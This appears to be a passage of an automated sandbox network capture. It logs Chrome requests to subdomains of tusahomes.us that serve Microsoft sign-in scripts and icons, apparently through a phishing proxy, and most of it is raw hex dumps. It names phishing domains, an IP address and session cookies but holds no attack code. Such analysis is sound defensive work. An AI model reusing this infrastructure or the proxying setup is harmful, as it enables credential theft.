                                                                2025-04-09 00:19:12 UTC12891INData Raw: d2 61 74 fe f1 70 3f bd 25 8c 03 1e 04 13 af e4 1e 4a 56 a0 29 b6 8e 45 20 2a c9 44 03 73 5e e8 6a 09 55 ac c0 59 a7 4d 7a ff b4 ba 0a 6e 17 1e ff b7 38 5d f7 4f 69 af 48 ef 74 a5 ef 16 c5 7f 36 92 68 84 e1 ab a0 69 f6 f2 9e ba 05 14 4f ce 5b 4a f3 96 96 be b5 53 9a af a4 e4 0a be bf 48 7b 2c fa 60 ee 20 bf 09 09 f1 22 3f b2 88 d4 5d 1b 31 5d 4a 7f 58 88 8e 07 02 79 a5 7e 6c 2f 30 be 4a 04 4a a9 2e 32 a6 d7 0c e1 54 e5 b5 3c 1a 5a 71 21 62 f4 e7 5d 9a de f8 57 74 8d 14 1a 1b ea 75 56 3f bb e5 ab 87 aa 94 f0 72 6d 6d 93 fd a5 5b 1c 02 7c be 49 7d be bb d8 a2 bf 57 62 b3 5d 07 ef 3a 6e f9 a1 40 62 ae ec 6b c8 bd d6 54 c1 6d 10 61 40 d7 5e e7 3a b8 9e cd 6e d5 09 ec 08 2d 03 0b ac fe c3 6b 77 98 ca db 05 50 f0 29 d9 ee 9d 94 ba 56 4e c1 1d ad aa 2a 72 10 e8
                                                                Data Ascii: atp?%JV)E *Ds^jUYMzn8]OiHt6hiO[JSH{,` "?]1]JXy~l/0JJ.2T<Zq!b]WtuV?rmm[|I}Wb]:n@bkTma@^:n-kwP)VN*r


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                33192.168.2.549752137.184.178.2314436448C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                TimestampBytes transferredDirectionData
                                                                2025-04-09 00:19:09 UTC670OUTGET /67f5bce71f9fd88e9ef40d75/ HTTP/1.1
                                                                Host: 330c68f2903044fdaf0390e944b7092d.tusahomes.us
                                                                Connection: Upgrade
                                                                Pragma: no-cache
                                                                Cache-Control: no-cache
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
                                                                Upgrade: websocket
                                                                Origin: https://330c68f2903044fdaf0390e944b7092d.tusahomes.us
                                                                Sec-WebSocket-Version: 13
                                                                Accept-Encoding: gzip, deflate, br, zstd
                                                                Accept-Language: en-US,en;q=0.9
                                                                Cookie: wZfUflpx=67f5bce71f9fd88e9ef40d75; AADSSO=NA|NoExtension; SSOCOOKIEPULLED=1
                                                                Sec-WebSocket-Key: wGaDgSvkJ5PfnezLf/4iSg==
                                                                Sec-WebSocket-Extensions: permessage-deflate; client_max_window_bits
                                                                2025-04-09 00:19:11 UTC719INHTTP/1.1 404 Not Found
                                                                Server: nginx
                                                                Date: Wed, 09 Apr 2025 00:19:11 GMT
                                                                Content-Type: text/html; charset=utf-8
                                                                Content-Length: 0
                                                                Connection: close
                                                                cache-control: private
                                                                p3p: CP="DSP CUR OTPi IND OTRi ONL FIN"
                                                                x-ms-request-id: 98b1f517-dd42-4897-a235-15c9e2ac0600
                                                                x-ms-ests-server: 2.1.20540.2 - EUS ProdSlices
                                                                report-to: {"group":"network-errors","max_age":86400,"endpoints":[{"url":"https://a4eaec44075f43d19af55316af4b7550.tusahomes.us/api/report?catId=GW+estsfd+wst"}]}
                                                                nel: {"report_to":"network-errors","max_age":86400,"success_fraction":0.001,"failure_fraction":1.0}
                                                                x-ms-srs: 1.P
                                                                referrer-policy: strict-origin-when-cross-origin
                                                                access-control-allow-origin: *
                                                                access-control-allow-headers: *


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                34192.168.2.549753137.184.178.2314436448C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                TimestampBytes transferredDirectionData
                                                                2025-04-09 00:19:12 UTC746OUTGET /shared/1.0/content/images/favicon_a_eupayfgghqiai7k9sol6lg2.ico HTTP/1.1
                                                                Host: 69b4c8ec5bd242c881fabaa43bd7e0c7.tusahomes.us
                                                                Connection: keep-alive
                                                                sec-ch-ua-platform: "Windows"
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
                                                                sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"
                                                                sec-ch-ua-mobile: ?0
                                                                Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                Sec-Fetch-Site: same-site
                                                                Sec-Fetch-Mode: no-cors
                                                                Sec-Fetch-Dest: image
                                                                Referer: https://330c68f2903044fdaf0390e944b7092d.tusahomes.us/
                                                                Accept-Encoding: gzip, deflate, br, zstd
                                                                Accept-Language: en-US,en;q=0.9
                                                                Cookie: wZfUflpx=67f5bce71f9fd88e9ef40d75
                                                                2025-04-09 00:19:15 UTC753INHTTP/1.1 200 OK
                                                                Server: nginx
                                                                Date: Wed, 09 Apr 2025 00:19:14 GMT
                                                                Content-Type: image/x-icon
                                                                Content-Length: 20486
                                                                Connection: close
                                                                cache-control: public, max-age=31536000
                                                                last-modified: Sun, 18 Oct 2020 03:02:03 GMT
                                                                etag: 0x8D8731230C851A6
                                                                x-ms-request-id: dc2a36b6-c01e-001e-2b69-a55831000000
                                                                x-ms-version: 2009-09-19
                                                                x-ms-lease-status: unlocked
                                                                x-ms-blob-type: BlockBlob
                                                                access-control-expose-headers: x-ms-request-id,Server,x-ms-version,Content-Type,Cache-Control,Last-Modified,ETag,x-ms-lease-status,x-ms-blob-type,Content-Length,Date,Transfer-Encoding
                                                                access-control-allow-origin: *
                                                                x-azure-ref: 20250409T001914Z-1686b48456frrpr2hC1SJCadqs0000000d3g000000004t9z
                                                                x-fd-int-roxy-purgeid: 0
                                                                x-cache: TCP_HIT
                                                                accept-ranges: bytes
                                                                2025-04-09 00:19:15 UTC15631INData Raw: 00 00 01 00 06 00 10 10 00 00 00 00 20 00 4d 02 00 00 66 00 00 00 18 18 00 00 00 00 20 00 d0 04 00 00 b3 02 00 00 20 20 00 00 00 00 20 00 8b 08 00 00 83 07 00 00 30 30 00 00 00 00 20 00 62 13 00 00 0e 10 00 00 40 40 00 00 00 00 20 00 65 22 00 00 70 23 00 00 80 80 00 00 00 00 20 00 31 0a 00 00 d5 45 00 00 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 10 00 00 00 10 08 06 00 00 00 1f f3 ff 61 00 00 02 14 49 44 41 54 78 9c 3d d3 31 72 24 45 10 85 e1 2f ab aa 5b 1a 69 b4 ab d5 62 60 ac c3 8d b8 06 11 e0 71 04 b0 b8 02 26 47 e1 14 f8 1b 04 04 48 5a 49 a1 99 9e ee aa c4 18 05 5e a6 93 ef 8f f7 47 c6 97 6f bf 59 89 4d 9a 4b e8 29 8f c8 cb b9 ec a6 7f ea cf 3f fe f4 c7 87 af b6 f8 e1 78 cc cf 11 6e 32 25 1e 93 9b 12 de b7 10 4b 66 66 89 d8 c8 89 98 c8
                                                                Data Ascii: Mf 00 b@@ e"p# 1EPNGIHDRaIDATx=1r$E/[ib`q&GHZI^GoYMK)?xn2%Kff
                                                                2025-04-09 00:19:15 UTC4855INData Raw: d7 bc 4a 6e 33 1a fe 90 54 17 74 35 94 83 87 81 44 d0 03 e0 d7 0f 23 20 42 4b 3f b5 75 65 03 56 7e 49 e4 0a 89 e7 c9 18 81 29 c2 7d 64 6e 47 18 92 80 48 49 e8 b9 7e e6 28 4b 9e 65 9f cb 04 0c 63 8a 72 06 e3 23 d6 2c 99 f0 04 25 db 18 23 84 39 89 96 16 47 78 4c 81 4b b8 bf 45 51 81 e5 4c d7 0e 11 de 63 34 79 82 83 b5 51 0c 9e 60 30 9e 53 2f 17 34 ab f3 84 e8 74 4d a6 5d 1b e2 60 36 20 16 37 31 9a 3d c2 60 74 2b 45 f5 18 22 91 c9 f1 67 b0 7c 40 6e 57 c4 aa c2 dd 37 c0 68 49 ca 57 f9 e2 0a ac 71 84 b3 18 91 c0 29 94 9d 8d 20 ff 00 e3 33 e0 32 73 66 28 25 46 22 71 40 00 8c 8f 59 f1 43 46 dc 8e f0 11 03 94 84 11 98 33 e0 29 2a e6 ec 71 85 15 3f e5 18 25 ce 01 46 cb 14 41 f8 9f 14 09 35 c2 5d 80 a2 1a c0 b7 80 7b 58 ef 1b 21 08 5d dd d0 d6 0b 42 1c 23 9c 26 75
                                                                Data Ascii: Jn3Tt5D# BK?ueV~I)}dnGHI~(Kecr#,%#9GxLKEQLc4yQ`0S/4tM]`6 71=`t+E"g|@nW7hIWq) 32sf(%F"q@YCF3)*q?%FA5]{X!]B#&u


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                35192.168.2.549754137.184.178.2314436448C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                TimestampBytes transferredDirectionData
                                                                2025-04-09 00:19:12 UTC715OUTGET /shared/1.0/content/js/asyncchunk/convergedlogin_pcustomizationloader_41f36656d3c0bb04c90c.js HTTP/1.1
                                                                Host: 69b4c8ec5bd242c881fabaa43bd7e0c7.tusahomes.us
                                                                Connection: keep-alive
                                                                sec-ch-ua-platform: "Windows"
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
                                                                sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"
                                                                sec-ch-ua-mobile: ?0
                                                                Accept: */*
                                                                Sec-Fetch-Site: same-site
                                                                Sec-Fetch-Mode: no-cors
                                                                Sec-Fetch-Dest: script
                                                                Referer: https://330c68f2903044fdaf0390e944b7092d.tusahomes.us/
                                                                Accept-Encoding: gzip, deflate, br, zstd
                                                                Accept-Language: en-US,en;q=0.9
                                                                Cookie: wZfUflpx=67f5bce71f9fd88e9ef40d75
                                                                2025-04-09 00:19:15 UTC834INHTTP/1.1 200 OK
                                                                Server: nginx
                                                                Date: Wed, 09 Apr 2025 00:19:15 GMT
                                                                Content-Type: application/x-javascript
                                                                Content-Length: 116540
                                                                Connection: close
                                                                cache-control: public, max-age=31536000
                                                                last-modified: Wed, 19 Mar 2025 22:11:52 GMT
                                                                etag: 0x8DD67330D88A349
                                                                x-ms-request-id: bc59bde8-d01e-0036-3b9c-a7718b000000
                                                                x-ms-version: 2009-09-19
                                                                x-ms-lease-status: unlocked
                                                                x-ms-blob-type: BlockBlob
                                                                access-control-expose-headers: x-ms-request-id,Server,x-ms-version,Content-Type,Content-Encoding,Cache-Control,Last-Modified,ETag,x-ms-lease-status,x-ms-blob-type,Content-Length,Date,Transfer-Encoding
                                                                access-control-allow-origin: *
                                                                x-azure-ref: 20250409T001914Z-1686b48456f4qnxthC1SJCxtv80000000cc0000000001k90
                                                                x-fd-int-roxy-purgeid: 4554691
                                                                x-cache: TCP_HIT
                                                                x-cache-info: L1_T2
                                                                accept-ranges: bytes
                                                                content-encoding: gzip
                                                                2025-04-09 00:19:15 UTC15550INData Raw: 1f 8b 08 00 00 00 00 00 00 ff ec 7d 5b 5b db 48 b6 e8 fb fe 15 b6 a6 c7 2d c5 85 b1 8d 31 20 23 3c 24 21 3d cc 24 81 0d a4 7b 7a 88 27 9f b0 cb 58 89 91 3c ba 70 69 ec fd db cf 5a ab aa a4 92 2c 83 49 f7 3e e7 e1 4c 7f 1d ac 4b a9 ee b5 ee 97 cd 57 d5 ff aa bc aa 6c ac ff 5f e5 fc e2 f0 ec a2 72 f2 ae 72 f1 d7 e3 b3 b7 95 53 b8 fb b5 f2 f1 e4 e2 f8 cd d1 fa f5 60 a3 f8 ef 62 e2 45 95 b1 37 e5 15 f8 bd 72 23 3e aa 04 7e 25 08 2b 9e 3f 0c c2 59 10 ba 31 8f 2a 37 f0 37 f4 dc 69 65 1c 06 37 95 78 c2 2b b3 30 f8 ca 87 71 54 99 7a 51 0c 1f 5d f1 69 70 57 31 a1 ba 70 54 39 75 c3 f8 a1 72 7c 6a 35 a0 7e 0e b5 79 d7 9e 0f 5f 0f 83 d9 03 5c 4f e2 8a 1f c4 de 90 57 5c 7f 44 b5 4d e1 c6 8f 78 25 f1 47 3c ac dc 4d bc e1 a4 f2 c1 1b 86 41 14 8c e3 4a c8 87 dc bb 85 46
                                                                Data Ascii: }[[H-1 #<$!=${z'X<piZ,I>LKWl_rrS`bE7r#>~%+?Y1*77ie7x+0qTzQ]ipW1pT9ur|j5~y_\OW\DMx%G<MAJF
                                                                2025-04-09 00:19:15 UTC14460INData Raw: 59 4f b3 82 e8 6c 21 45 36 98 6f 8f b8 9f 5c c1 e6 a2 94 6d a1 53 e3 0a cd 2e 32 fe 16 cb 93 4e 1a 95 a4 50 12 7a 78 dc 68 13 59 ca 26 65 31 70 6a 88 9e 58 29 c2 2c 85 e2 19 6d ac 09 a4 a5 e9 69 3f e8 3f f5 3a 15 54 23 4d 58 5a 50 33 e1 ce 15 c6 f1 60 d4 76 39 a2 d2 7d 0a c4 6c 4a 7b 28 72 48 0c 1b 29 1f 49 83 69 74 84 3e 47 69 0c c3 16 25 bc 94 e1 13 dd 74 4e 49 35 50 cd 71 1a a6 38 7c 0e 79 38 48 14 eb 17 4e 03 ea a3 c4 b9 74 c8 09 23 3d 98 d9 ed 46 7a 2f 12 94 aa c6 f7 db 48 e4 aa eb 6c a7 44 4e 9b 25 9b f0 c7 c5 3f 21 fc 29 b0 97 a9 64 a1 45 fe 8b 22 36 76 03 93 d3 7d 3a f6 e3 56 f7 f5 91 c9 5f 45 d6 82 76 2a 8d 7b ec 6c 08 5f 24 cf 09 7b de 7e 42 d1 d2 29 1f 41 cc 3c 0b 6a 41 73 ec 0d ac 6e 0c c7 c1 db 18 8b 9e 8a 27 30 11 63 c7 b3 18 3c ae b7 34 ab
                                                                Data Ascii: YOl!E6o\mS.2NPzxhY&e1pjX),mi??:T#MXZP3`v9}lJ{(rH)Iit>Gi%tNI5Pq8|y8HNt#=Fz/HlDN%?!)dE"6v}:V_Ev*{l_${~B)A<jAsn'0c<4
                                                                2025-04-09 00:19:15 UTC16384INData Raw: 53 81 b4 36 db 3c f0 09 3f 93 4d 07 6f 09 5e 84 05 72 4f b4 84 94 e1 32 cc a3 ca d4 35 7f 6d 82 e3 09 58 74 85 8c 92 ae 39 31 37 02 44 64 ce 2f c2 4b 6f 73 33 52 f3 b3 26 17 e9 b9 c1 66 6c b4 cd d9 f1 19 91 55 0a 6a 24 f1 b5 67 4f d6 d1 13 23 cb 7e 83 a3 24 ff 40 b1 a1 37 db df 4a 35 a8 27 24 47 18 68 4c bc 6d 31 69 09 b1 a9 6a a1 ef 0e c3 14 05 c5 c2 fe 78 0a 20 7a 17 6c b6 6d b8 30 ee 26 67 c0 25 e7 70 d1 9e 59 26 58 72 ba c7 76 31 69 44 e9 55 e1 90 03 1c d8 ee 3e 09 29 e8 5d d4 83 9b c9 47 52 0e 73 17 c7 48 87 12 61 17 d1 13 5e 04 ca b6 90 e0 9c 6b 38 1b e0 8c 1e 1f 79 4f 8f 8f 2d 9e 8e a1 cd a5 22 68 f1 97 e0 15 8c 3f b2 46 db 04 3b 49 ad 84 f8 d1 b9 44 ac e4 84 97 8e 06 bc 99 62 c8 f6 c1 97 75 b0 70 be cc 53 3f 3a 6c 59 e1 c2 1a 11 09 a3 8c 2f 31 19
                                                                Data Ascii: S6<?Mo^rO25mXt917Dd/Kos3R&flUj$gO#~$@7J5'$GhLm1ijx zlm0&g%pY&Xrv1iDU>)]GRsHa^k8yO-"h?F;IDbupS?:lY/1
                                                                2025-04-09 00:19:15 UTC16384INData Raw: b6 b6 3b db 3b bb fb fb 3b 9d bd ed 4e 67 3f da de 66 d0 3a 50 ff bb 3b 7b ad ce f6 f6 76 e7 00 6a 02 2b b5 3a a7 23 34 27 1d ce 38 24 2e dd b6 2f cb f1 38 32 d9 05 32 d5 5c c6 13 e3 f1 44 9b 0e 83 94 6f 9b 86 8a 31 ca e4 50 2a b7 de ae 5a 97 61 e6 bf 55 69 c0 7d 29 be 3e d8 f6 96 48 0b 96 0c 9f 39 97 f7 45 f4 03 e1 06 07 1d da 0b 14 a0 56 a6 e0 18 9f 3a 72 3a d6 e6 31 2a a0 4f 2d 99 e2 1b 79 c9 9a ba 93 d5 c1 2f d5 64 bb 07 52 01 29 e8 da 03 bc 0f 4b 5a 99 3d 7e 79 76 a4 48 be b3 2b b2 e2 1e e0 99 99 06 28 94 42 79 0c 70 ca a3 93 29 dc f4 80 88 93 a6 31 5a b8 4e 93 e6 77 61 11 fe 14 47 b7 70 a5 26 4d 05 3c b8 50 d5 1d 70 13 4c 0c 98 5d 05 33 e3 e9 1a e0 71 23 b6 01 bb 04 8a eb 86 39 59 94 c7 7f 47 d9 84 84 29 bb e5 2f ae c3 bb 97 0b 00 07 0a 25 75 af d0
                                                                Data Ascii: ;;;Ng?f:P;{vj+:#4'8$./822\Do1P*ZaUi})>H9EV:r:1*O-y/dR)KZ=~yvH+(Byp)1ZNwaGp&M<PpL]3q#9YG)/%u
                                                                2025-04-09 00:19:15 UTC16384INData Raw: 70 8b e8 05 e8 75 cb 6a c5 e5 98 0f fa f8 00 a9 b0 39 a3 aa 22 41 7e 42 b5 d1 59 d6 a4 15 a5 24 b8 bb 30 bf 2b fb 3e b1 4a 53 68 90 98 7c ca 1a 0c d0 f0 28 61 1f 19 e0 fe fa cb 0f c5 db 8a b9 1b 90 3e d4 5b 66 10 ac 65 14 b3 81 9e d3 32 de f5 d3 bd b8 12 f2 4e ab 68 4d c1 6f c8 86 ce 0e 65 34 d5 4a bd 47 7b 16 26 50 4f 9f b6 bb 3b 3b 31 fd 5b c5 64 be a8 a7 ca bb a3 0f 01 42 0f ba 1d 3a 06 ef 82 b3 6a 14 bb e4 65 cd 17 e2 26 4c 28 91 3b 55 d9 1c a1 b6 dc c5 2b d6 c2 73 72 54 02 d6 ea a6 0a ea 5c 9f 91 b4 4b 31 87 45 fc d9 95 55 6a b2 2e 2c 53 ff 05 81 b5 5d 54 20 09 80 79 f9 2c b5 dd 7d 45 8f 16 96 38 86 ea 67 81 ee aa 52 cb 50 55 86 7a 61 fe ed f4 cd 6b 43 81 82 b1 7a 36 9d 36 c5 de 9b c7 6e 86 61 c8 73 0f 4e 9d d9 a3 c4 b3 f1 43 e1 0e ca 01 ea d5 4e 22
                                                                Data Ascii: puj9"A~BY$0+>JSh|(a>[fe2NhMoe4JG{&PO;;1[dB:je&L(;U+srT\K1EUj.,S]T y,}E8gRPUzakCz66nasNCN"
                                                                2025-04-09 00:19:15 UTC16384INData Raw: 4d 4d 7a 2c 9c f3 11 a7 99 79 f9 86 e8 43 3c 91 02 be e8 30 b2 68 8b d3 f9 64 4d 23 f3 84 7e ec c8 a4 33 cb ea 47 e6 17 fa a1 23 cb 1a 45 e6 39 fd 0c 23 f3 b4 dc cf d3 d7 50 93 1f 65 93 26 8c 27 5f 11 a8 68 29 7c ab 2d 0f 3b ff 84 50 43 4a bd 8b 38 98 d3 f9 fc 8a 66 0f 7e 3c 6c 88 73 1a 9e c4 db 4f 23 2c 64 de 4f bd d0 ee a3 61 a4 81 34 3d fd 7e 30 f2 af ed 11 be 94 02 48 dc 7e 09 ec 09 7e 89 4e e8 3a bd d6 76 d7 0c 87 f6 98 7e 1f cc 7b 01 cb ad 5f e9 93 ef 74 c2 94 34 a4 cc 0c be d1 c5 a4 51 fb 11 81 29 0d 21 3e 79 08 18 a2 4c b3 d4 1c d1 79 62 21 d2 23 65 47 7f 3a 7b e8 99 3b 9e 64 cd 17 f1 ac 8a 01 a7 3e 20 08 89 9c 0f c8 7e db f4 21 11 e5 aa 95 c5 82 b1 d2 25 bd 31 c6 88 ef 4c a8 7f cc 91 3e 68 b9 b2 16 4e ad 69 94 2d 71 9d 90 aa 63 b5 ce be 78 aa d6
                                                                Data Ascii: MMz,yC<0hdM#~3G#E9#Pe&'_h)|-;PCJ8f~<lsO#,dOa4=~0H~~N:v~{_t4Q)!>yLyb!#eG:{;d> ~!%1L>hNi-qcx
                                                                2025-04-09 00:19:16 UTC16384INData Raw: 5d 23 75 a3 fd ed 50 93 3e bc 7d 26 99 91 c5 5b 10 cd fd 0c e5 20 1d fc d9 06 a9 87 33 cf 68 23 98 a0 4f df c4 a1 8a e2 5b 5a ce 50 52 00 ed 6b 42 f2 b7 74 2b 0f 76 33 4c 53 d0 46 bc cf 6e 68 fe 2f 2e 63 f2 f9 c6 1a d3 79 32 65 33 c9 63 fd ca bc 31 30 2f 04 c8 e2 e8 b8 91 e4 44 ba b1 19 9d c9 c3 74 09 01 1c 6d 30 f5 81 57 44 ed 69 1a 91 79 15 22 ed 2a ed cf 87 57 72 3f b7 3f 83 47 53 d5 de 12 0d 37 d1 e9 fb 57 17 9f 2f 61 f0 08 42 e3 8b 7e a7 8f f4 1b 01 58 34 bf ca b8 11 89 be de 00 1b 7c b2 aa ed 4f 87 37 aa c5 4f d4 e2 b1 fe c6 d4 5f 59 37 17 9f 2e 33 e7 60 e7 55 4b 2a 57 5f c9 e9 fa d1 ba 91 06 84 98 ed 9e 58 84 97 44 76 5d 7c bc 34 df 98 a7 34 0d ed 1f b3 59 35 8e f5 97 e6 8f 20 49 09 22 80 55 62 ea eb a5 f4 1f d8 7a 6b 0d f4 8f b4 84 a7 d4 c2 8f 58
                                                                Data Ascii: ]#uP>}&[ 3h#O[ZPRkBt+v3LSFnh/.cy2e3c10/Dtm0WDiy"*Wr??GS7W/aB~X4|O7O_Y7.3`UK*W_XDv]|44Y5 I"UbzkX
                                                                2025-04-09 00:19:16 UTC4610INData Raw: 65 d9 13 3c 4d 58 9a 0f 9c 8f 8e b2 ad 99 d0 13 82 e4 90 34 15 e7 7d 63 3e dd 87 56 7a 83 48 d0 87 d6 9b 41 45 7e 90 6e 61 cc 64 08 bb 3c 1c e4 a1 1a dc 49 b2 5a 4d 69 11 a3 18 c8 2e a5 d7 2a 21 54 8c 97 cb 7c f0 87 93 60 f8 e9 55 88 4e ab 4f e4 6e 5b 09 06 3c 11 80 79 4a 69 a4 04 de 22 22 55 23 72 b4 cd 01 48 11 d4 5b dd 78 df 6b a2 d5 a7 da 66 a4 31 10 9f 3a 14 42 aa 8d 7a a0 c0 ec b5 30 58 42 bd ee 08 74 a6 c1 2c 7b da b6 2d ee 5c 25 d5 bd b3 48 3d 4d ec db 1e ee c5 5a ab 43 9b 71 a1 c7 75 ef 40 08 9e 21 ad df 04 50 53 c6 6a fc 01 dc 45 35 29 e5 73 ee ee 60 1a f0 52 0b 9d 3f 40 65 70 0e 97 fc 4a 2a 58 92 d0 4e 4b a4 54 a0 69 32 f5 c0 6c 0a 58 7e 9b 76 62 37 2a 93 29 ee 2b 8a ad 77 8b dc 06 a2 d3 8e 78 6a c9 ab b7 7e 54 ab 9d c2 c4 15 b5 a5 69 39 80 a1
                                                                Data Ascii: e<MX4}c>VzHAE~nad<IZMi.*!T|`UNOn[<yJi""U#rH[xkf1:Bz0XBt,{-\%H=MZCqu@!PSjE5)s`R?@epJ*XNKTi2lX~vb7*)+wxj~Ti9


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                36192.168.2.549756137.184.178.2314436448C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                TimestampBytes transferredDirectionData
                                                                2025-04-09 00:19:15 UTC515OUTGET /shared/1.0/content/images/favicon_a_eupayfgghqiai7k9sol6lg2.ico HTTP/1.1
                                                                Host: 69b4c8ec5bd242c881fabaa43bd7e0c7.tusahomes.us
                                                                Connection: keep-alive
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
                                                                Accept: */*
                                                                Sec-Fetch-Site: none
                                                                Sec-Fetch-Mode: cors
                                                                Sec-Fetch-Dest: empty
                                                                Sec-Fetch-Storage-Access: active
                                                                Accept-Encoding: gzip, deflate, br, zstd
                                                                Accept-Language: en-US,en;q=0.9
                                                                Cookie: wZfUflpx=67f5bce71f9fd88e9ef40d75
                                                                2025-04-09 00:19:18 UTC759INHTTP/1.1 200 OK
                                                                Server: nginx
                                                                Date: Wed, 09 Apr 2025 00:19:18 GMT
                                                                Content-Type: image/x-icon
                                                                Content-Length: 20615
                                                                Connection: close
                                                                cache-control: public, max-age=31536000
                                                                last-modified: Sun, 18 Oct 2020 03:02:03 GMT
                                                                etag: 0x8D8731230C851A6
                                                                x-ms-request-id: 9df1a2ca-a01e-0018-14b6-a56b8e000000
                                                                x-ms-version: 2009-09-19
                                                                x-ms-lease-status: unlocked
                                                                x-ms-blob-type: BlockBlob
                                                                access-control-expose-headers: x-ms-request-id,Server,x-ms-version,Content-Type,Cache-Control,Last-Modified,ETag,x-ms-lease-status,x-ms-blob-type,Content-Length,Date,Transfer-Encoding
                                                                access-control-allow-origin: *
                                                                x-azure-ref: 20250409T001917Z-1686b48456fmjqvmhC1SJCu36g0000000cug000000009d29
                                                                x-fd-int-roxy-purgeid: 4554691
                                                                x-cache: TCP_HIT
                                                                accept-ranges: bytes
                                                                2025-04-09 00:19:18 UTC15625INData Raw: 00 00 01 00 06 00 10 10 00 00 00 00 20 00 3e 02 00 00 66 00 00 00 18 18 00 00 00 00 20 00 c3 04 00 00 a4 02 00 00 20 20 00 00 00 00 20 00 89 08 00 00 67 07 00 00 30 30 00 00 00 00 20 00 71 13 00 00 f0 0f 00 00 40 40 00 00 00 00 20 00 d2 22 00 00 61 23 00 00 80 80 00 00 00 00 20 00 54 0a 00 00 33 46 00 00 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 10 00 00 00 10 08 06 00 00 00 1f f3 ff 61 00 00 02 05 49 44 41 54 78 9c 35 d3 b1 6e 2c 45 10 46 e1 af 7a 66 76 d7 be eb 6b 10 ba 12 09 09 4f c4 53 90 11 40 4a 46 8e c4 03 f1 26 84 44 48 08 ec eb b5 bd b3 3b d3 3f c1 2c 15 b5 5a aa ee 53 a7 aa ea f4 dd b7 73 38 85 d6 a8 ce 2b 59 a7 a9 be 3e fc 3b fc fa e3 2f 7f 9c 3f cd f5 f3 7c cd b5 48 18 8a e7 f0 09 4f 63 78 0f fb 26 6b d4 80 c7 44 86 ed 4c e9 d5
                                                                Data Ascii: >f g00 q@@ "a# T3FPNGIHDRaIDATx5n,EFzfvkOS@JF&DH;?,ZSs8+Y>;/?|HOcx&kDL
                                                                2025-04-09 00:19:18 UTC4990INData Raw: be 40 53 c2 12 5f 6f f2 43 a0 a3 64 44 66 15 0d fa 08 4b ce 01 81 4c 85 f1 0c c2 2f d0 e7 a7 98 f3 bb 08 fb 08 2d 70 16 67 4c 89 b3 5c bb 80 de e6 01 05 f6 e8 38 cf 88 03 c0 51 64 c5 01 63 2c dd a0 6b 5e a3 37 dc c4 71 52 9a d1 35 86 f8 16 55 ef eb 68 1c 60 f9 67 69 66 25 aa 4a 8c 9b ac db b1 88 d6 88 16 2c 27 10 e2 f3 14 e5 21 72 2e 10 15 8a 5a 91 00 55 4f 71 13 42 18 00 d0 74 09 97 f8 39 74 94 08 1d d7 81 c0 06 23 96 18 eb 21 23 1a c6 c0 41 84 c1 ed dc 3a b2 c9 1c 27 f0 55 22 7f 01 a8 71 5e a0 e3 1d 7a 28 ce 05 60 82 c2 3a 78 42 60 13 61 83 31 ff 08 65 9b cc 39 c5 fd 1d 56 f5 bc 11 f3 c9 8c de f0 17 c0 46 98 2b 1a a0 6b 96 88 9c 46 e3 ca 52 12 ee b4 dc 7a 36 d4 57 e3 46 5d 93 e9 9a 8c 06 c7 f3 98 9c 4e d3 8b 7b 34 cb ef e1 ec 91 73 41 28 ff 34 b1 2e 11
                                                                Data Ascii: @S_oCdDfKL/-pgL\8Qdc,k^7qR5Uh`gif%J,'!r.ZUOqBt9t#!#A:'U"q^z(`:xB`a1e9VF+kFRz6WF]N{4sA(4.


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                37192.168.2.549758137.184.178.2314436448C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                TimestampBytes transferredDirectionData
                                                                2025-04-09 00:19:16 UTC717OUTGET /shared/1.0/content/js/asyncchunk/convergedlogin_pfetchsessionsprogress_268b957e4bf672b8fe6b.js HTTP/1.1
                                                                Host: 69b4c8ec5bd242c881fabaa43bd7e0c7.tusahomes.us
                                                                Connection: keep-alive
                                                                sec-ch-ua-platform: "Windows"
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
                                                                sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"
                                                                sec-ch-ua-mobile: ?0
                                                                Accept: */*
                                                                Sec-Fetch-Site: same-site
                                                                Sec-Fetch-Mode: no-cors
                                                                Sec-Fetch-Dest: script
                                                                Referer: https://330c68f2903044fdaf0390e944b7092d.tusahomes.us/
                                                                Accept-Encoding: gzip, deflate, br, zstd
                                                                Accept-Language: en-US,en;q=0.9
                                                                Cookie: wZfUflpx=67f5bce71f9fd88e9ef40d75
                                                                2025-04-09 00:19:18 UTC832INHTTP/1.1 200 OK
                                                                Server: nginx
                                                                Date: Wed, 09 Apr 2025 00:19:18 GMT
                                                                Content-Type: application/x-javascript
                                                                Content-Length: 5566
                                                                Connection: close
                                                                cache-control: public, max-age=31536000
                                                                last-modified: Wed, 19 Mar 2025 22:11:53 GMT
                                                                etag: 0x8DD67330DE3F0FC
                                                                x-ms-request-id: 10a3298a-301e-000a-4f9d-a7105e000000
                                                                x-ms-version: 2009-09-19
                                                                x-ms-lease-status: unlocked
                                                                x-ms-blob-type: BlockBlob
